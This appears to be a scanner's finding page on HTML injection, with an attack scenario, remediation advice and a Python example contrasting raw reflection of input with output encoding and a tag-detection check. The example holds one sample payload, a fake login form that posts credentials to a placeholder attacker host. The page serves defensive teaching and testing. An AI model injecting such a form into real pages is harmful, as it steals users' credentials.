HTML Injection

Description

During the scan, Cytrix found that HTML injection is possible.
This vulnerability occurs when a user's input is not correctly validated and the output is not encoded before it is placed in the page.

A successful HTML injection allows the attacker to deliver malicious HTML pages to a victim.
This can allow the attacker to change or delete parts of the site as the victim sees it.

A possible attack scenario is demonstrated below:

  1. The attacker discovers the injection vulnerability and decides to use an HTML-based injection attack.
  2. The attacker then crafts a malicious link that includes the injected HTML content and sends it to a user via email.
  3. The user visits the page because it is located within a trusted domain.
  4. The attacker's injected HTML is rendered and presented to the user, asking for a username and password.
  5. The user enters a username and password, both of which are sent to the attacker's server.

Recommendation

Look for HTML elements in the incoming HTTP stream that contain the user's input.
Remove any HTML-syntax substrings (such as tags and links) from user-supplied text, and encode the output so the browser treats the input as text rather than markup.
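As an added example (not part of the Cytrix description), the reflected-input bug beside the output-encoded version the Description calls for, with a parser-based check of which tags actually reach the browser. The payload string, function names and the "p"-only template are constructed for illustration.

```python
import html
from html.parser import HTMLParser

# Constructed sample of attacker-controlled input: the fake login form
# from the scenario above, pointing at a placeholder host.
UNTRUSTED_NAME = (
    '<form action="https://attacker.invalid/collect">'
    'Username <input name="u"> Password <input name="p"></form>'
)


def render_greeting_vulnerable(name: str) -> str:
    """Reflects user input straight into the page: HTML injection."""
    return f"<p>Welcome back, {name}!</p>"


def render_greeting_encoded(name: str) -> str:
    """Output-encodes the input so '<', '>', '&' and quotes become
    character references and the browser renders them as text."""
    return f"<p>Welcome back, {html.escape(name, quote=True)}!</p>"


class _TagCollector(HTMLParser):
    """Records every start tag the browser's parser would see."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)


def rendered_tags(markup: str) -> list[str]:
    """Tag names present in the final HTML, in document order."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def has_unexpected_tags(markup: str, allowed=("p",)) -> bool:
    """True if any tag outside the template's own allow-list appears,
    i.e. user input has been interpreted as markup."""
    return any(tag not in allowed for tag in rendered_tags(markup))


if __name__ == "__main__":
    print("vulnerable:", rendered_tags(render_greeting_vulnerable(UNTRUSTED_NAME)))
    print("encoded:   ", rendered_tags(render_greeting_encoded(UNTRUSTED_NAME)))
```

The same allow-list check can run in a unit test against each template, so a regression that reintroduces raw concatenation is caught before release.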

References

https://cwe.mitre.org/data/definitions/80.html